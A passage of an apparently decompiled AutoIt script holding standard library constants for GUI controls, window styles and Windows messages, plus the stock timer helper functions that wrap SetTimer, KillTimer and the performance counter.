  718. GLOBAL CONST $BUTTON_IMAGELIST_ALIGN_LEFT=0
  719. GLOBAL CONST $BUTTON_IMAGELIST_ALIGN_RIGHT=1
  720. GLOBAL CONST $BUTTON_IMAGELIST_ALIGN_TOP=2
  721. GLOBAL CONST $BUTTON_IMAGELIST_ALIGN_BOTTOM=3
  722. GLOBAL CONST $BUTTON_IMAGELIST_ALIGN_CENTER=4
  723. GLOBAL CONST $BS_3STATE=5
  724. GLOBAL CONST $BS_AUTO3STATE=6
  725. GLOBAL CONST $BS_AUTOCHECKBOX=3
  726. GLOBAL CONST $BS_CHECKBOX=2
  727. GLOBAL CONST $BS_RADIOBUTTON=4
  728. GLOBAL CONST $BS_AUTORADIOBUTTON=9
  729. GLOBAL CONST $BS_OWNERDRAW=11
  730. GLOBAL CONST $GUI_SS_DEFAULT_BUTTON=0
  731. GLOBAL CONST $GUI_SS_DEFAULT_CHECKBOX=0
  732. GLOBAL CONST $GUI_SS_DEFAULT_GROUP=0
  733. GLOBAL CONST $GUI_SS_DEFAULT_RADIO=0
  734. GLOBAL CONST $BCM_FIRST=5632
  735. GLOBAL CONST $BCM_GETIDEALSIZE=($BCM_FIRST+1)
  736. GLOBAL CONST $BCM_GETIMAGELIST=($BCM_FIRST+3)
  737. GLOBAL CONST $BCM_GETNOTE=($BCM_FIRST+10)
  738. GLOBAL CONST $BCM_GETNOTELENGTH=($BCM_FIRST+11)
  739. GLOBAL CONST $BCM_GETSPLITINFO=($BCM_FIRST+8)
  740. GLOBAL CONST $BCM_GETTEXTMARGIN=($BCM_FIRST+5)
  741. GLOBAL CONST $BCM_SETDROPDOWNSTATE=($BCM_FIRST+6)
  742. GLOBAL CONST $BCM_SETIMAGELIST=($BCM_FIRST+2)
  743. GLOBAL CONST $BCM_SETNOTE=($BCM_FIRST+9)
  744. GLOBAL CONST $BCM_SETSHIELD=($BCM_FIRST+12)
  745. GLOBAL CONST $BCM_SETSPLITINFO=($BCM_FIRST+7)
  746. GLOBAL CONST $BCM_SETTEXTMARGIN=($BCM_FIRST+4)
  747. GLOBAL CONST $BM_CLICK=245
  748. GLOBAL CONST $BM_GETCHECK=240
  749. GLOBAL CONST $BM_GETIMAGE=246
  750. GLOBAL CONST $BM_GETSTATE=242
  751. GLOBAL CONST $BM_SETCHECK=241
  752. GLOBAL CONST $BM_SETDONTCLICK=248
  753. GLOBAL CONST $BM_SETIMAGE=247
  754. GLOBAL CONST $BM_SETSTATE=243
  755. GLOBAL CONST $BM_SETSTYLE=244
  756. GLOBAL CONST $BCN_FIRST=-1250
  757. GLOBAL CONST $BCN_DROPDOWN=($BCN_FIRST+2)
  758. GLOBAL CONST $BCN_HOTITEMCHANGE=($BCN_FIRST+1)
  759. GLOBAL CONST $BN_CLICKED=0
  760. GLOBAL CONST $BN_PAINT=1
  761. GLOBAL CONST $BN_HILITE=2
  762. GLOBAL CONST $BN_UNHILITE=3
  763. GLOBAL CONST $BN_DISABLE=4
  764. GLOBAL CONST $BN_DOUBLECLICKED=5
  765. GLOBAL CONST $BN_SETFOCUS=6
  766. GLOBAL CONST $BN_KILLFOCUS=7
  767. GLOBAL CONST $BN_PUSHED=$BN_HILITE
  768. GLOBAL CONST $BN_UNPUSHED=$BN_UNHILITE
  769. GLOBAL CONST $BN_DBLCLK=$BN_DOUBLECLICKED
  770. GLOBAL CONST $BST_CHECKED=1
  771. GLOBAL CONST $BST_INDETERMINATE=2
  772. GLOBAL CONST $BST_UNCHECKED=0
  773. GLOBAL CONST $BST_FOCUS=8
  774. GLOBAL CONST $BST_PUSHED=4
  775. GLOBAL CONST $BST_DONTCLICK=128
  776. GLOBAL CONST $ES_LEFT=0
  777. GLOBAL CONST $ES_CENTER=1
  778. GLOBAL CONST $ES_RIGHT=2
  779. GLOBAL CONST $ES_MULTILINE=4
  780. GLOBAL CONST $ES_UPPERCASE=8
  781. GLOBAL CONST $ES_LOWERCASE=16
  782. GLOBAL CONST $ES_PASSWORD=32
  783. GLOBAL CONST $ES_AUTOVSCROLL=64
  784. GLOBAL CONST $ES_AUTOHSCROLL=128
  785. GLOBAL CONST $ES_NOHIDESEL=256
  786. GLOBAL CONST $ES_OEMCONVERT=1024
  787. GLOBAL CONST $ES_READONLY=2048
  788. GLOBAL CONST $ES_WANTRETURN=4096
  789. GLOBAL CONST $ES_NUMBER=8192
  790. GLOBAL CONST $EC_ERR=-1
  791. GLOBAL CONST $ECM_FIRST=5376
  792. GLOBAL CONST $EM_CANUNDO=198
  793. GLOBAL CONST $EM_CHARFROMPOS=215
  794. GLOBAL CONST $EM_EMPTYUNDOBUFFER=205
  795. GLOBAL CONST $EM_FMTLINES=200
  796. GLOBAL CONST $EM_GETCUEBANNER=($ECM_FIRST+2)
  797. GLOBAL CONST $EM_GETFIRSTVISIBLELINE=206
  798. GLOBAL CONST $EM_GETHANDLE=189
  799. GLOBAL CONST $EM_GETIMESTATUS=217
  800. GLOBAL CONST $EM_GETLIMITTEXT=213
  801. GLOBAL CONST $EM_GETLINE=196
  802. GLOBAL CONST $EM_GETLINECOUNT=186
  803. GLOBAL CONST $EM_GETMARGINS=212
  804. GLOBAL CONST $EM_GETMODIFY=184
  805. GLOBAL CONST $EM_GETPASSWORDCHAR=210
  806. GLOBAL CONST $EM_GETRECT=178
  807. GLOBAL CONST $EM_GETSEL=176
  808. GLOBAL CONST $EM_GETTHUMB=190
  809. GLOBAL CONST $EM_GETWORDBREAKPROC=209
  810. GLOBAL CONST $EM_HIDEBALLOONTIP=($ECM_FIRST+4)
  811. GLOBAL CONST $EM_LIMITTEXT=197
  812. GLOBAL CONST $EM_LINEFROMCHAR=201
  813. GLOBAL CONST $EM_LINEINDEX=187
  814. GLOBAL CONST $EM_LINELENGTH=193
  815. GLOBAL CONST $EM_LINESCROLL=182
  816. GLOBAL CONST $EM_POSFROMCHAR=214
  817. GLOBAL CONST $EM_REPLACESEL=194
  818. GLOBAL CONST $EM_SCROLL=181
  819. GLOBAL CONST $EM_SCROLLCARET=183
  820. GLOBAL CONST $EM_SETCUEBANNER=($ECM_FIRST+1)
  821. GLOBAL CONST $EM_SETHANDLE=188
  822. GLOBAL CONST $EM_SETIMESTATUS=216
  823. GLOBAL CONST $EM_SETLIMITTEXT=$EM_LIMITTEXT
  824. GLOBAL CONST $EM_SETMARGINS=211
  825. GLOBAL CONST $EM_SETMODIFY=185
  826. GLOBAL CONST $EM_SETPASSWORDCHAR=204
  827. GLOBAL CONST $EM_SETREADONLY=207
  828. GLOBAL CONST $EM_SETRECT=179
  829. GLOBAL CONST $EM_SETRECTNP=180
  830. GLOBAL CONST $EM_SETSEL=177
  831. GLOBAL CONST $EM_SETTABSTOPS=203
  832. GLOBAL CONST $EM_SETWORDBREAKPROC=208
  833. GLOBAL CONST $EM_SHOWBALLOONTIP=($ECM_FIRST+3)
  834. GLOBAL CONST $EM_UNDO=199
  835. GLOBAL CONST $EC_LEFTMARGIN=1
  836. GLOBAL CONST $EC_RIGHTMARGIN=2
  837. GLOBAL CONST $EC_USEFONTINFO=65535
  838. GLOBAL CONST $EMSIS_COMPOSITIONSTRING=1
  839. GLOBAL CONST $EIMES_GETCOMPSTRATONCE=1
  840. GLOBAL CONST $EIMES_CANCELCOMPSTRINFOCUS=2
  841. GLOBAL CONST $EIMES_COMPLETECOMPSTRKILLFOCUS=4
  842. GLOBAL CONST $EN_ALIGN_LTR_EC=1792
  843. GLOBAL CONST $EN_ALIGN_RTL_EC=1793
  844. GLOBAL CONST $EN_CHANGE=768
  845. GLOBAL CONST $EN_ERRSPACE=1280
  846. GLOBAL CONST $EN_HSCROLL=1537
  847. GLOBAL CONST $EN_KILLFOCUS=512
  848. GLOBAL CONST $EN_MAXTEXT=1281
  849. GLOBAL CONST $EN_SETFOCUS=256
  850. GLOBAL CONST $EN_UPDATE=1024
  851. GLOBAL CONST $EN_VSCROLL=1538
  852. GLOBAL CONST $TTI_NONE=0
  853. GLOBAL CONST $TTI_INFO=1
  854. GLOBAL CONST $TTI_WARNING=2
  855. GLOBAL CONST $TTI_ERROR=3
  856. GLOBAL CONST $TTI_INFO_LARGE=4
  857. GLOBAL CONST $TTI_WARNING_LARGE=5
  858. GLOBAL CONST $TTI_ERROR_LARGE=6
  859. GLOBAL CONST $__EDITCONSTANT_WS_VSCROLL=2097152
  860. GLOBAL CONST $__EDITCONSTANT_WS_HSCROLL=1048576
  861. GLOBAL CONST $GUI_SS_DEFAULT_EDIT=BITOR($ES_WANTRETURN,$__EDITCONSTANT_WS_VSCROLL,$__EDITCONSTANT_WS_HSCROLL,$ES_AUTOVSCROLL,$ES_AUTOHSCROLL)
  862. GLOBAL CONST $GUI_SS_DEFAULT_INPUT=BITOR($ES_LEFT,$ES_AUTOHSCROLL)
  863. GLOBAL CONST $GUI_EVENT_CLOSE=-3
  864. GLOBAL CONST $GUI_EVENT_MINIMIZE=-4
  865. GLOBAL CONST $GUI_EVENT_RESTORE=-5
  866. GLOBAL CONST $GUI_EVENT_MAXIMIZE=-6
  867. GLOBAL CONST $GUI_EVENT_PRIMARYDOWN=-7
  868. GLOBAL CONST $GUI_EVENT_PRIMARYUP=-8
  869. GLOBAL CONST $GUI_EVENT_SECONDARYDOWN=-9
  870. GLOBAL CONST $GUI_EVENT_SECONDARYUP=-10
  871. GLOBAL CONST $GUI_EVENT_MOUSEMOVE=-11
  872. GLOBAL CONST $GUI_EVENT_RESIZED=-12
  873. GLOBAL CONST $GUI_EVENT_DROPPED=-13
  874. GLOBAL CONST $GUI_RUNDEFMSG="GUI_RUNDEFMSG"
  875. GLOBAL CONST $GUI_AVISTOP=0
  876. GLOBAL CONST $GUI_AVISTART=1
  877. GLOBAL CONST $GUI_AVICLOSE=2
  878. GLOBAL CONST $GUI_CHECKED=1
  879. GLOBAL CONST $GUI_INDETERMINATE=2
  880. GLOBAL CONST $GUI_UNCHECKED=4
  881. GLOBAL CONST $GUI_DROPACCEPTED=8
  882. GLOBAL CONST $GUI_NODROPACCEPTED=4096
  883. GLOBAL CONST $GUI_ACCEPTFILES=$GUI_DROPACCEPTED
  884. GLOBAL CONST $GUI_SHOW=16
  885. GLOBAL CONST $GUI_HIDE=32
  886. GLOBAL CONST $GUI_ENABLE=64
  887. GLOBAL CONST $GUI_DISABLE=128
  888. GLOBAL CONST $GUI_FOCUS=256
  889. GLOBAL CONST $GUI_NOFOCUS=8192
  890. GLOBAL CONST $GUI_DEFBUTTON=512
  891. GLOBAL CONST $GUI_EXPAND=1024
  892. GLOBAL CONST $GUI_ONTOP=2048
  893. GLOBAL CONST $GUI_FONTITALIC=2
  894. GLOBAL CONST $GUI_FONTUNDER=4
  895. GLOBAL CONST $GUI_FONTSTRIKE=8
  896. GLOBAL CONST $GUI_DOCKAUTO=1
  897. GLOBAL CONST $GUI_DOCKLEFT=2
  898. GLOBAL CONST $GUI_DOCKRIGHT=4
  899. GLOBAL CONST $GUI_DOCKHCENTER=8
  900. GLOBAL CONST $GUI_DOCKTOP=32
  901. GLOBAL CONST $GUI_DOCKBOTTOM=64
  902. GLOBAL CONST $GUI_DOCKVCENTER=128
  903. GLOBAL CONST $GUI_DOCKWIDTH=256
  904. GLOBAL CONST $GUI_DOCKHEIGHT=512
  905. GLOBAL CONST $GUI_DOCKSIZE=768
  906. GLOBAL CONST $GUI_DOCKMENUBAR=544
  907. GLOBAL CONST $GUI_DOCKSTATEBAR=576
  908. GLOBAL CONST $GUI_DOCKALL=802
  909. GLOBAL CONST $GUI_DOCKBORDERS=102
  910. GLOBAL CONST $GUI_GR_CLOSE=1
  911. GLOBAL CONST $GUI_GR_LINE=2
  912. GLOBAL CONST $GUI_GR_BEZIER=4
  913. GLOBAL CONST $GUI_GR_MOVE=6
  914. GLOBAL CONST $GUI_GR_COLOR=8
  915. GLOBAL CONST $GUI_GR_RECT=10
  916. GLOBAL CONST $GUI_GR_ELLIPSE=12
  917. GLOBAL CONST $GUI_GR_PIE=14
  918. GLOBAL CONST $GUI_GR_DOT=16
  919. GLOBAL CONST $GUI_GR_PIXEL=18
  920. GLOBAL CONST $GUI_GR_HINT=20
  921. GLOBAL CONST $GUI_GR_REFRESH=22
  922. GLOBAL CONST $GUI_GR_PENSIZE=24
  923. GLOBAL CONST $GUI_GR_NOBKCOLOR=-2
  924. GLOBAL CONST $GUI_BKCOLOR_DEFAULT=-1
  925. GLOBAL CONST $GUI_BKCOLOR_TRANSPARENT=-2
  926. GLOBAL CONST $GUI_BKCOLOR_LV_ALTERNATE=-33554432
  927. GLOBAL CONST $GUI_WS_EX_PARENTDRAG=1048576
  928. GLOBAL CONST $SS_LEFT=0
  929. GLOBAL CONST $SS_CENTER=1
  930. GLOBAL CONST $SS_RIGHT=2
  931. GLOBAL CONST $SS_ICON=3
  932. GLOBAL CONST $SS_BLACKRECT=4
  933. GLOBAL CONST $SS_GRAYRECT=5
  934. GLOBAL CONST $SS_WHITERECT=6
  935. GLOBAL CONST $SS_BLACKFRAME=7
  936. GLOBAL CONST $SS_GRAYFRAME=8
  937. GLOBAL CONST $SS_WHITEFRAME=9
  938. GLOBAL CONST $SS_SIMPLE=11
  939. GLOBAL CONST $SS_LEFTNOWORDWRAP=12
  940. GLOBAL CONST $SS_BITMAP=14
  941. GLOBAL CONST $SS_ETCHEDHORZ=16
  942. GLOBAL CONST $SS_ETCHEDVERT=17
  943. GLOBAL CONST $SS_ETCHEDFRAME=18
  944. GLOBAL CONST $SS_NOPREFIX=128
  945. GLOBAL CONST $SS_NOTIFY=256
  946. GLOBAL CONST $SS_CENTERIMAGE=512
  947. GLOBAL CONST $SS_RIGHTJUST=1024
  948. GLOBAL CONST $SS_SUNKEN=4096
  949. GLOBAL CONST $GUI_SS_DEFAULT_LABEL=0
  950. GLOBAL CONST $GUI_SS_DEFAULT_GRAPHIC=0
  951. GLOBAL CONST $GUI_SS_DEFAULT_ICON=$SS_NOTIFY
  952. GLOBAL CONST $GUI_SS_DEFAULT_PIC=$SS_NOTIFY
  953. GLOBAL $_TIMERS_ATIMERIDS[1][3]
  954. FUNC _TIMER_DIFF($ITIMESTAMP)
  955. RETURN 1000*(__TIMER_QUERYPERFORMANCECOUNTER()-$ITIMESTAMP)/__TIMER_QUERYPERFORMANCEFREQUENCY()
  956. ENDFUNC
  957. FUNC _TIMER_GETIDLETIME()
  958. LOCAL $TSTRUCT=DLLSTRUCTCREATE("uint;dword")
  959. DLLSTRUCTSETDATA($TSTRUCT,1,DLLSTRUCTGETSIZE($TSTRUCT))
  960. LOCAL $ARESULT=DLLCALL("user32.dll","bool","GetLastInputInfo","ptr",DLLSTRUCTGETPTR($TSTRUCT))
  961. IF @ERROR OR $ARESULT[0]=0 THEN RETURN SETERROR(@ERROR,@EXTENDED,0)
  962. LOCAL $AVTICKS=DLLCALL("Kernel32.dll","dword","GetTickCount")
  963. IF @ERROR OR NOT $ARESULT[0]THEN RETURN SETERROR(@ERROR,@EXTENDED,0)
  964. LOCAL $IDIFF=$AVTICKS[0]-DLLSTRUCTGETDATA($TSTRUCT,2)
  965. IF $IDIFF<0 THEN RETURN SETEXTENDED(1,$AVTICKS[0])
  966. RETURN $IDIFF
  967. ENDFUNC
  968. FUNC _TIMER_GETTIMERID($IWPARAM)
  969. LOCAL $_ITIMERID=DEC(HEX($IWPARAM,8)),$IMAX=UBOUND($_TIMERS_ATIMERIDS)-1
  970. FOR $X=1 TO $IMAX
  971. IF $_ITIMERID=$_TIMERS_ATIMERIDS[$X][1]THEN RETURN $_TIMERS_ATIMERIDS[$X][0]
  972. NEXT
  973. RETURN 0
  974. ENDFUNC
  975. FUNC _TIMER_INIT()
  976. RETURN __TIMER_QUERYPERFORMANCECOUNTER()
  977. ENDFUNC
  978. FUNC _TIMER_KILLALLTIMERS($HWND)
  979. LOCAL $INUMTIMERS=$_TIMERS_ATIMERIDS[0][0]
  980. IF $INUMTIMERS=0 THEN RETURN FALSE
  981. LOCAL $ARESULT,$HCALLBACK=0
  982. FOR $X=$INUMTIMERS TO 1 STEP -1
  983. IF ISHWND($HWND)THEN
  984. $ARESULT=DLLCALL("user32.dll","bool","KillTimer","hwnd",$HWND,"uint_ptr",$_TIMERS_ATIMERIDS[$X][1])
  985. ELSE
  986. $ARESULT=DLLCALL("user32.dll","bool","KillTimer","hwnd",$HWND,"uint_ptr",$_TIMERS_ATIMERIDS[$X][0])
  987. ENDIF
  988. IF @ERROR OR $ARESULT[0]=0 THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  989. $HCALLBACK=$_TIMERS_ATIMERIDS[$X][2]
  990. IF $HCALLBACK<>0 THEN DLLCALLBACKFREE($HCALLBACK)
  991. $_TIMERS_ATIMERIDS[0][0]-=1
  992. NEXT
  993. REDIM $_TIMERS_ATIMERIDS[1][3]
  994. RETURN TRUE
  995. ENDFUNC
  996. FUNC _TIMER_KILLTIMER($HWND,$ITIMERID)
  997. LOCAL $ARESULT[1]=[0],$HCALLBACK=0,$IUBOUND=UBOUND($_TIMERS_ATIMERIDS)-1
  998. FOR $X=1 TO $IUBOUND
  999. IF $_TIMERS_ATIMERIDS[$X][0]=$ITIMERID THEN
  1000. IF ISHWND($HWND)THEN
  1001. $ARESULT=DLLCALL("user32.dll","bool","KillTimer","hwnd",$HWND,"uint_ptr",$_TIMERS_ATIMERIDS[$X][1])
  1002. ELSE
  1003. $ARESULT=DLLCALL("user32.dll","bool","KillTimer","hwnd",$HWND,"uint_ptr",$_TIMERS_ATIMERIDS[$X][0])
  1004. ENDIF
  1005. IF @ERROR OR $ARESULT[0]=0 THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  1006. $HCALLBACK=$_TIMERS_ATIMERIDS[$X][2]
  1007. IF $HCALLBACK<>0 THEN DLLCALLBACKFREE($HCALLBACK)
  1008. FOR $I=$X TO $IUBOUND-1
  1009. $_TIMERS_ATIMERIDS[$I][0]=$_TIMERS_ATIMERIDS[$I+1][0]
  1010. $_TIMERS_ATIMERIDS[$I][1]=$_TIMERS_ATIMERIDS[$I+1][1]
  1011. $_TIMERS_ATIMERIDS[$I][2]=$_TIMERS_ATIMERIDS[$I+1][2]
  1012. NEXT
  1013. REDIM $_TIMERS_ATIMERIDS[UBOUND($_TIMERS_ATIMERIDS-1)][3]
  1014. $_TIMERS_ATIMERIDS[0][0]-=1
  1015. EXITLOOP
  1016. ENDIF
  1017. NEXT
  1018. RETURN $ARESULT[0]<>0
  1019. ENDFUNC
  1020. FUNC __TIMER_QUERYPERFORMANCECOUNTER()
  1021. LOCAL $ARESULT=DLLCALL("kernel32.dll","bool","QueryPerformanceCounter","int64*",0)
  1022. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,-1)
  1023. RETURN SETEXTENDED($ARESULT[0],$ARESULT[1])
  1024. ENDFUNC
  1025. FUNC __TIMER_QUERYPERFORMANCEFREQUENCY()
  1026. LOCAL $ARESULT=DLLCALL("kernel32.dll","bool","QueryPerformanceFrequency","int64*",0)
  1027. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,0)
  1028. RETURN SETEXTENDED($ARESULT[0],$ARESULT[1])
  1029. ENDFUNC
  1030. FUNC _TIMER_SETTIMER($HWND,$IELAPSE=250,$STIMERFUNC="",$ITIMERID=-1)
  1031. LOCAL $ARESULT[1]=[0],$PTIMERFUNC=0,$HCALLBACK=0,$IINDEX=$_TIMERS_ATIMERIDS[0][0]+1
  1032. IF $ITIMERID=-1 THEN
  1033. REDIM $_TIMERS_ATIMERIDS[$IINDEX+1][3]
  1034. $_TIMERS_ATIMERIDS[0][0]=$IINDEX
  1035. $ITIMERID=$IINDEX+1000
  1036. FOR $X=1 TO $IINDEX
  1037. IF $_TIMERS_ATIMERIDS[$X][0]=$ITIMERID THEN
  1038. $ITIMERID=$ITIMERID+1
  1039. $X=0
  1040. ENDIF
  1041. NEXT
  1042. IF $STIMERFUNC<>"" THEN
  1043. $HCALLBACK=DLLCALLBACKREGISTER($STIMERFUNC,"none","hwnd;int;uint_ptr;dword")
  1044. IF $HCALLBACK=0 THEN RETURN SETERROR(-1,-1,0)
  1045. $PTIMERFUNC=DLLCALLBACKGETPTR($HCALLBACK)
  1046. IF $PTIMERFUNC=0 THEN RETURN SETERROR(-1,-1,0)
  1047. ENDIF
  1048. $ARESULT=DLLCALL("user32.dll","uint_ptr","SetTimer","hwnd",$HWND,"uint_ptr",$ITIMERID,"uint",$IELAPSE,"ptr",$PTIMERFUNC)
  1049. IF @ERROR OR $ARESULT[0]=0 THEN RETURN SETERROR(@ERROR,@EXTENDED,0)
  1050. $_TIMERS_ATIMERIDS[$IINDEX][0]=$ARESULT[0]
  1051. $_TIMERS_ATIMERIDS[$IINDEX][1]=$ITIMERID
  1052. $_TIMERS_ATIMERIDS[$IINDEX][2]=$HCALLBACK
  1053. ELSE
  1054. FOR $X=1 TO $IINDEX-1
  1055. IF $_TIMERS_ATIMERIDS[$X][0]=$ITIMERID THEN
  1056. IF ISHWND($HWND)THEN $ITIMERID=$_TIMERS_ATIMERIDS[$X][1]
  1057. $HCALLBACK=$_TIMERS_ATIMERIDS[$X][2]
  1058. IF $HCALLBACK<>0 THEN
  1059. $PTIMERFUNC=DLLCALLBACKGETPTR($HCALLBACK)
  1060. IF $PTIMERFUNC=0 THEN RETURN SETERROR(-1,-1,0)
  1061. ENDIF
  1062. $ARESULT=DLLCALL("user32.dll","uint_ptr","SetTimer","hwnd",$HWND,"uint_ptr",$ITIMERID,"int",$IELAPSE,"ptr",$PTIMERFUNC)
  1063. IF @ERROR OR $ARESULT[0]=0 THEN RETURN SETERROR(@ERROR,@EXTENDED,0)
  1064. EXITLOOP
  1065. ENDIF
  1066. NEXT
  1067. ENDIF
  1068. RETURN $ARESULT[0]
  1069. ENDFUNC
  1070. GLOBAL CONST $WS_TILED=0
  1071. GLOBAL CONST $WS_OVERLAPPED=0
  1072. GLOBAL CONST $WS_MAXIMIZEBOX=65536
  1073. GLOBAL CONST $WS_MINIMIZEBOX=131072
  1074. GLOBAL CONST $WS_TABSTOP=65536
  1075. GLOBAL CONST $WS_GROUP=131072
  1076. GLOBAL CONST $WS_SIZEBOX=262144
  1077. GLOBAL CONST $WS_THICKFRAME=262144
  1078. GLOBAL CONST $WS_SYSMENU=524288
  1079. GLOBAL CONST $WS_HSCROLL=1048576
  1080. GLOBAL CONST $WS_VSCROLL=2097152
  1081. GLOBAL CONST $WS_DLGFRAME=4194304
  1082. GLOBAL CONST $WS_BORDER=8388608
  1083. GLOBAL CONST $WS_CAPTION=12582912
  1084. GLOBAL CONST $WS_OVERLAPPEDWINDOW=13565952
  1085. GLOBAL CONST $WS_TILEDWINDOW=13565952
  1086. GLOBAL CONST $WS_MAXIMIZE=16777216
  1087. GLOBAL CONST $WS_CLIPCHILDREN=33554432
  1088. GLOBAL CONST $WS_CLIPSIBLINGS=67108864
  1089. GLOBAL CONST $WS_DISABLED=134217728
  1090. GLOBAL CONST $WS_VISIBLE=268435456
  1091. GLOBAL CONST $WS_MINIMIZE=536870912
  1092. GLOBAL CONST $WS_CHILD=1073741824
  1093. GLOBAL CONST $WS_POPUP=-2147483648
  1094. GLOBAL CONST $WS_POPUPWINDOW=-2138570752
  1095. GLOBAL CONST $DS_MODALFRAME=128
  1096. GLOBAL CONST $DS_SETFOREGROUND=512
  1097. GLOBAL CONST $DS_CONTEXTHELP=8192
  1098. GLOBAL CONST $WS_EX_ACCEPTFILES=16
  1099. GLOBAL CONST $WS_EX_MDICHILD=64
  1100. GLOBAL CONST $WS_EX_APPWINDOW=262144
  1101. GLOBAL CONST $WS_EX_COMPOSITED=33554432
  1102. GLOBAL CONST $WS_EX_CLIENTEDGE=512
  1103. GLOBAL CONST $WS_EX_CONTEXTHELP=1024
  1104. GLOBAL CONST $WS_EX_DLGMODALFRAME=1
  1105. GLOBAL CONST $WS_EX_LEFTSCROLLBAR=16384
  1106. GLOBAL CONST $WS_EX_OVERLAPPEDWINDOW=768
  1107. GLOBAL CONST $WS_EX_RIGHT=4096
  1108. GLOBAL CONST $WS_EX_STATICEDGE=131072
  1109. GLOBAL CONST $WS_EX_TOOLWINDOW=128
  1110. GLOBAL CONST $WS_EX_TOPMOST=8
  1111. GLOBAL CONST $WS_EX_TRANSPARENT=32
  1112. GLOBAL CONST $WS_EX_WINDOWEDGE=256
  1113. GLOBAL CONST $WS_EX_LAYERED=524288
  1114. GLOBAL CONST $WS_EX_CONTROLPARENT=65536
  1115. GLOBAL CONST $WS_EX_LAYOUTRTL=4194304
  1116. GLOBAL CONST $WS_EX_RTLREADING=8192
  1117. GLOBAL CONST $WM_GETTEXTLENGTH=14
  1118. GLOBAL CONST $WM_GETTEXT=13
  1119. GLOBAL CONST $WM_SIZE=5
  1120. GLOBAL CONST $WM_SIZING=532
  1121. GLOBAL CONST $WM_USER=1024
  1122. GLOBAL CONST $WM_CREATE=1
  1123. GLOBAL CONST $WM_DESTROY=2
  1124. GLOBAL CONST $WM_MOVE=3
  1125. GLOBAL CONST $WM_ACTIVATE=6
  1126. GLOBAL CONST $WM_SETFOCUS=7
  1127. GLOBAL CONST $WM_KILLFOCUS=8
  1128. GLOBAL CONST $WM_ENABLE=10
  1129. GLOBAL CONST $WM_SETREDRAW=11
  1130. GLOBAL CONST $WM_SETTEXT=12
  1131. GLOBAL CONST $WM_PAINT=15
  1132. GLOBAL CONST $WM_CLOSE=16
  1133. GLOBAL CONST $WM_QUIT=18
  1134. GLOBAL CONST $WM_ERASEBKGND=20
  1135. GLOBAL CONST $WM_SYSCOLORCHANGE=21
  1136. GLOBAL CONST $WM_SHOWWINDOW=24
  1137. GLOBAL CONST $WM_WININICHANGE=26
  1138. GLOBAL CONST $WM_DEVMODECHANGE=27
  1139. GLOBAL CONST $WM_ACTIVATEAPP=28
  1140. GLOBAL CONST $WM_FONTCHANGE=29
  1141. GLOBAL CONST $WM_TIMECHANGE=30
  1142. GLOBAL CONST $WM_CANCELMODE=31
  1143. GLOBAL CONST $WM_SETCURSOR=32
  1144. GLOBAL CONST $WM_MOUSEACTIVATE=33
  1145. GLOBAL CONST $WM_CHILDACTIVATE=34
  1146. GLOBAL CONST $WM_QUEUESYNC=35
  1147. GLOBAL CONST $WM_GETMINMAXINFO=36
  1148. GLOBAL CONST $WM_PAINTICON=38
  1149. GLOBAL CONST $WM_ICONERASEBKGND=39
  1150. GLOBAL CONST $WM_NEXTDLGCTL=40
  1151. GLOBAL CONST $WM_SPOOLERSTATUS=42
  1152. GLOBAL CONST $WM_DRAWITEM=43
  1153. GLOBAL CONST $WM_MEASUREITEM=44
  1154. GLOBAL CONST $WM_DELETEITEM=45
  1155. GLOBAL CONST $WM_VKEYTOITEM=46
  1156. GLOBAL CONST $WM_CHARTOITEM=47
  1157. GLOBAL CONST $WM_SETFONT=48
  1158. GLOBAL CONST $WM_GETFONT=49
  1159. GLOBAL CONST $WM_SETHOTKEY=50
  1160. GLOBAL CONST $WM_GETHOTKEY=51
  1161. GLOBAL CONST $WM_QUERYDRAGICON=55
  1162. GLOBAL CONST $WM_COMPAREITEM=57
  1163. GLOBAL CONST $WM_GETOBJECT=61
  1164. GLOBAL CONST $WM_COMPACTING=65
  1165. GLOBAL CONST $WM_COMMNOTIFY=68
  1166. GLOBAL CONST $WM_WINDOWPOSCHANGING=70
  1167. GLOBAL CONST $WM_WINDOWPOSCHANGED=71
  1168. GLOBAL CONST $WM_POWER=72
  1169. GLOBAL CONST $WM_NOTIFY=78
  1170. GLOBAL CONST $WM_COPYDATA=74
  1171. GLOBAL CONST $WM_CANCELJOURNAL=75
  1172. GLOBAL CONST $WM_INPUTLANGCHANGEREQUEST=80
  1173. GLOBAL CONST $WM_INPUTLANGCHANGE=81
  1174. GLOBAL CONST $WM_TCARD=82
  1175. GLOBAL CONST $WM_HELP=83
  1176. GLOBAL CONST $WM_USERCHANGED=84
  1177. GLOBAL CONST $WM_NOTIFYFORMAT=85
  1178. GLOBAL CONST $WM_CUT=768
  1179. GLOBAL CONST $WM_COPY=769
  1180. GLOBAL CONST $WM_PASTE=770
  1181. GLOBAL CONST $WM_CLEAR=771
  1182. GLOBAL CONST $WM_UNDO=772
  1183. GLOBAL CONST $WM_CONTEXTMENU=123
  1184. GLOBAL CONST $WM_STYLECHANGING=124
  1185. GLOBAL CONST $WM_STYLECHANGED=125
  1186. GLOBAL CONST $WM_DISPLAYCHANGE=126
  1187. GLOBAL CONST $WM_GETICON=127
  1188. GLOBAL CONST $WM_SETICON=128
  1189. GLOBAL CONST $WM_NCCREATE=129
  1190. GLOBAL CONST $WM_NCDESTROY=130
  1191. GLOBAL CONST $WM_NCCALCSIZE=131
  1192. GLOBAL CONST $WM_NCHITTEST=132
  1193. GLOBAL CONST $WM_NCPAINT=133
  1194. GLOBAL CONST $WM_NCACTIVATE=134
  1195. GLOBAL CONST $WM_GETDLGCODE=135
  1196. GLOBAL CONST $WM_SYNCPAINT=136
  1197. GLOBAL CONST $WM_NCMOUSEMOVE=160
  1198. GLOBAL CONST $WM_NCLBUTTONDOWN=161
  1199. GLOBAL CONST $WM_NCLBUTTONUP=162
  1200. GLOBAL CONST $WM_NCLBUTTONDBLCLK=163
  1201. GLOBAL CONST $WM_NCRBUTTONDOWN=164
  1202. GLOBAL CONST $WM_NCRBUTTONUP=165
  1203. GLOBAL CONST $WM_NCRBUTTONDBLCLK=166
  1204. GLOBAL CONST $WM_NCMBUTTONDOWN=167
  1205. GLOBAL CONST $WM_NCMBUTTONUP=168
  1206. GLOBAL CONST $WM_NCMBUTTONDBLCLK=169
  1207. GLOBAL CONST $WM_KEYDOWN=256
  1208. GLOBAL CONST $WM_KEYUP=257
  1209. GLOBAL CONST $WM_CHAR=258
  1210. GLOBAL CONST $WM_DEADCHAR=259
